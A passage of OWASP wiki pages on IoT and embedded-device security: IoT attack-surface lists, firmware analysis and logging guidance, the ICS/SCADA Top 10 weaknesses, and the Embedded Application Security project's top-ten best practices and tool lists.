** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Embedded_Application_Security&diff=245203OWASP Embedded Application Security2018-11-16T21:23:21Z<p>Aaron.guzman: /* Main */</p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:100px;border:0,margin:0;overflow: hidden;">[[File:Incubator_big.jpg|link=OWASP_Project_Stages#tab=Incubator_Projects]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
==OWASP Embedded Application Security Project ==<br />
<br />
Every year the prevalent use of embedded software within enterprise and consumer devices continues to rise exponentially. With widespread publicity of the Internet of Things (IoT), more and more devices are becoming network connected evidencing how essential it is to create secure coding guidelines for embedded software. Embedded Application Security is often not a high priority for embedded developers when they are producing devices such as routers, managed switches, medical devices, Industrial Control Systems (ICS), VoIP phones, IoT devices, and ATM Kiosks due to other challenges outside of development. Other challenges developers face may include, but are not limited to, the Original Design Manufacturer (ODM) supply chain, limited memory, a small stack, and the challenge of pushing firmware updates securely to an endpoint. The goals of this project are to create a list of best practices, provide practical guidance to embedded developers, and to draw on the existing OWASP resources that can bring application security expertise to the embedded world. It is important to note, each of the items and guidance points listed below are longstanding within software security. This document purely tailors issues that OWASP has previously provided guidance upon (e.g. OWASP Top 10, Mobile Top 10, etc.) to the embedded community. ''Given the prevalence of Linux kernels utilized within embedded devices, all code examples are geared towards a POSIX environment but the principles are designed to be platform agnostic.''<br />
<br />
For the most up to date best practices document, please visit [https://scriptingxss.gitbooks.io/embedded-appsec-best-practices// https://scriptingxss.gitbooks.io/embedded-appsec-best-practices/]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== Mailing List / Group Communication ==<br />
<br />
[https://groups.google.com/a/owasp.org/forum/?hl=en#!forum/embedded-appsec Embedded Sec Mailing List]<br />
[http://owasp.herokuapp.com/ Please join our OWASP Slack channel; look for the #embeddedappsec]<br />
<br />
== Project Leaders ==<br />
<br />
[https://owasp.org/index.php/User:Aaron.guzman Aaron Guzman] [mailto:aaron.guzman@owasp.org @]<br />
<br><br />
[https://owasp.org/index.php/User:Alex.Lafrenz Alex Lafrenz] [mailto:alex.lafrenz@owasp.org @]<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Internet of Things Project]]<br />
* [[C-Based Toolchain Hardening]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[IoT Firmware Analysis]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
== Releases ==<br />
[https://scriptingxss.gitbooks.io/top-10-embedded-appsec-best-practices/content/ Living Document (GitBook)] <br />
<br />
[https://www.gitbook.com/download/pdf/book/scriptingxss/top-10-embedded-appsec-best-practices Version 1 (2017)]<br />
<br />
Version 2 scheduled for Fall 2018<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" align="center" valign="top" width="50%" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= Embedded Best Practices =<br />
<br />
= Embedded Top 10 Best Practices =<br />
[https://scriptingxss.gitbooks.io/embedded-application-security-best-practices/content/ Click here to find additional details pertaining to each of the top ten categories listed below]<br />
== E1 – Buffer and Stack Overflow Protection ==<br />
Prevent the use of known dangerous functions and APIs in effort to protect against memory-corruption vulnerabilities within firmware. (e.g. Use of unsafe C functions - strcat, strcpy, sprintf, scanf) Memory-corruption vulnerabilities, such as buffer overflows, can consist of overflowing the stack (Stack overflow) or overflowing the heap (Heap overflow). For simplicity purposes, this document does not distinguish between these two types of vulnerabilities. In the event a buffer overflow has been detected and exploited by an attacker, the instruction pointer register is overwritten to execute the arbitrary malicious code provided by the attacker.<br />
== E2 – Injection Prevention ==<br />
Ensure all untrusted data and user input is validated, sanitized, and/or outputs encoded to prevent unintended system execution. There are various injection attacks within application security such as operating system (OS) command injection, cross-site scripting (E.g. JavaScript injection), SQL injection, and others such as XPath injection. However, the most prevalent of the injection attacks within embedded software pertain to OS command injection; when an application accepts untrusted/insecure input and passes it to external applications (either as the application name itself or arguments) without validation or proper escaping.<br />
<br />
== E3 – Firmware Updates and Cryptographic Signatures ==<br />
Ensure robust update mechanisms utilize cryptographically signed firmware images upon download and when applicable, for updating functions pertaining to third party software. Cryptographic signature allows for verification that files have not been modified or otherwise tampered with since the developer created and signed them. The signing and verification process uses public-key cryptography and it is difficult to forge a digital signature (e.g. PGP signature) without first gaining access to the private key. In the event a private key is compromised, developers of the software must revoke the compromised key and will need to re-sign all previous firmware releases with the new key.<br />
<br />
== E4 – Securing Sensitive Information ==<br />
Do not hardcode secrets such as passwords, usernames, tokens, private keys or similar variants into firmware release images. This also includes the storage of sensitive data that is written to disk. If hardware security element (SE) or Trusted Execution Environment (TEE) is available, it is recommended to utilize such features for storing sensitive data. Otherwise, use of strong cryptography should be evaluated to protect the data.<br />
If possible, all sensitive data in clear-text should be ephemeral by nature and reside in a volatile memory only.<br />
== E5 – Identity Management ==<br />
User accounts within an embedded device should not be static in nature. Features that allow separation of user accounts for internal web management, internal console access, as well as remote web management and remote console access should be available to prevent automated malicious attacks.<br />
<br />
== E6 – Embedded Framework and C-Based Hardening ==<br />
Limit BusyBox, embedded frameworks, and toolchains to only those libraries and functions being used when configuring firmware builds. Embedded Linux build systems such as Buildroot, Yocto and others typically perform this task. Removal of known insecure libraries and protocols such as Telnet not only minimize attack entry points in firmware builds, but also provide a secure-by-design approach to building software in efforts to thwart potential security threats.<br />
== E7 – Usage of Debug Code and Interfaces ==<br />
It is important to ensure all unnecessary pre-production build code, as well as dead and unused code, has been removed prior to firmware release to all market segments. This includes but is not limited to potential backdoor code and root privilege accounts that may have been left by parties such as Original Design Manufacturers (ODM) and Third-Party contractors. Typically this falls in scope for Original Equipment Manufacturers (OEM) to perform via reverse engineering of binaries. This should also require ODMs to sign Master Service Agreements (MSA) insuring that either no backdoor code is included and that all code has been reviewed for software security vulnerabilities holding all Third-Party developers accountable for devices that are mass deployed into the market.<br />
== E8 – Transport Layer Security ==<br />
Ensure all methods of communication are utilizing industry standard encryption configurations for TLS. The use of TLS ensures that all data remains confidential and untampered with while in transit. Utilize free certificate authority services such as Let’s Encrypt if the embedded device utilizes domain names.<br />
== E9 – Data collection Usage and Storage - Privacy ==<br />
It is critical to limit the collection, storage, and sharing of both personally identifiable information (PII) as well as sensitive personal information (SPI). Leaked information such as Social Security Numbers can lead to customers being compromised which could have legal repercussions for manufacturers. If information of this nature must be gathered, it is important to follow the concepts of Privacy-by-Design.<br />
== E10 – Third Party Code and Components ==<br />
Following setup of the toolchain, it is important to ensure that the kernel, software packages, and third party libraries are updated to protect against publicly known vulnerabilities. Software such as Rompager or embedded build tools such as Buildroot should be checked against vulnerability databases as well as their ChangeLogs to determine when and if an update is needed. It is important to note this process should be tested by developers and/or QA teams prior to release builds as updates to embedded systems can cause issues with the operations of those systems.<br />
Embedded projects should maintain a “Bill of Materials” of the third party and open source software included in its firmware images. This Bill of Materials should be checked to confirm that none of the third party software included has any unpatched vulnerabilities. Up to date vulnerability information may be found through the National Vulnerability Database or Open Hub.<br />
<br />
Several solutions exist for cataloging and auditing third party software:<br />
Retirejs for Javascript projects (free)<br />
Black Duck (paid)<br />
Package Managers (free)<br />
Buildroot (free)<br />
<br />
= Embedded Device Firmware Analysis Tools =<br />
Over the years, embedded security hardware and software tools have been introduced. Some free, some commercially based. If the lists below are missing tools from your arsenal, please feel free to add them. <br />
<br />
=== Hardware ===<br />
* JTagulator [http://www.grandideastudio.com/jtagulator/]<br />
* UART to USB<br />
** Shikra [http://int3.cc/products/the-shikra]<br />
* TTL RS323<br />
* C232HM Cable<br />
* JTAG Adapters<br />
** JLINK<br />
** Jtagulator<br />
** Flyswatter2<br />
* BusPirate<br />
* BusBlaster<br />
* CPLDs (in lieu of FPGAs)<br />
* Oscilloscopes<br />
* Multimeter (Ammeter, Voltmeter, etc)<br />
* Logic Analyzers [https://www.saleae.com/logic16]<br />
* OpenOCD<br />
*GreatFET [https://greatscottgadgets.com/greatfet/]<br />
*Solder station<br />
*Hot air rework gun<br />
*Clips<br />
*Leads<br />
*Headers<br />
*hooks <br />
<br />
=== Software ===<br />
* Angr - [https://github.com/angr/angr]<br />
* Firmadyne [https://github.com/firmadyne/firmadyne]<br />
* Firmwalker [https://github.com/craigz28/firmwalker]<br />
* [https://github.com/attify/firmware-analysis-toolkit Firmware Analysis Toolkit]<br />
* Binary Analysis [http://www.binaryanalysis.org/en/content/show/download]<br />
* Flawfinder [https://sourceforge.net/projects/flawfinder/]<br />
* IDA Pro (supports ARM / MIPS)<br />
* Radare2 [https://github.com/radare/radare2]<br />
* Buildroot<br />
* GDB<br />
* Binwalk [http://binwalk.org/]<br />
* Firmware-mod-toolkit [https://code.google.com/archive/p/firmware-mod-kit/]<br />
* Capstone framework [http://www.capstone-engine.org/]<br />
*[https://github.com/fkie-cad/FACT_core Firmware Analysis and Comparison Tool] <br />
*[https://github.com/attify/firmware-analysis-toolkit Firmware Analysis Toolkit]<br />
<br />
= Roadmap =<br />
<br />
== 2018 Roadmap ==<br />
Introductory Embedded Section<br />
* [x] Expand on what embedded firmware is (8,16,32 bit, minimal hardware resources, list embedded use cases and industries)<br />
* [x] Describe types of architectures (MIPS, ARM, PowerPC, x86 etc.)<br />
* [x] Describe types of firmware and operating systems<br />
* [ ] Layout of firmware for embedded linux, RTOS, and Embedded Window<br />
Expand on embedded best practices<br />
* [ ] Secure boot recommendations<br />
** [x] U-boot<br />
* [x] Create examples of software bill of materials (BOM)<br />
* [x] Additional example programming language command injection system calls or APIs<br />
* [ ] Break out subsections for each of the platforms with contextual guidance and configurations<br />
* [ ] Expand on hardening for:<br />
** [ ] Embedded Linux<br />
** [ ] RTOS (QNX/MQX)<br />
* [ ] Best practices/considerations for PKI in embedded systems<br />
Create example embedded application security requirements for new products<br />
* [ ] Integrate with ASVS or create an EASVS (Embedded Application Security Verification Standard)<br />
* [ ] Integrate with the IoT project<br />
Join the mailing list, slack channel (#embeddedappsec) and contact the Project leaders if you feel you can contribute.<br />
<br />
= Contributing =<br />
You do not have to be a security expert in order to contribute!<br />
<br />
Some of the ways you can help:<br />
* Technical editing<br />
* Review<br />
* Diagrams<br />
* Graphic design<br />
* Code snippets in your favorite language<br />
* Translate guidance material<br />
Feel free to sign up for a task out of our roadmap below or add your own idea to the roadmap. To get started, create a GitBook account or sign in with your Github credentials to add comments and make edits. All changes are tracked and synced to <nowiki>https://github.com/scriptingxss/embeddedappsec</nowiki>. Alternatively, clone the Github repo, use your favorite markdown editor, apply/make your edits, and submit a pull request. Feel free to contact the project leaders for ways to get involved.<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Embedded_Application_Security&diff=245202OWASP Embedded Application Security2018-11-16T21:21:36Z<p>Aaron.guzman: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:100px;border:0,margin:0;overflow: hidden;">[[File:Incubator_big.jpg|link=OWASP_Project_Stages#tab=Incubator_Projects]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
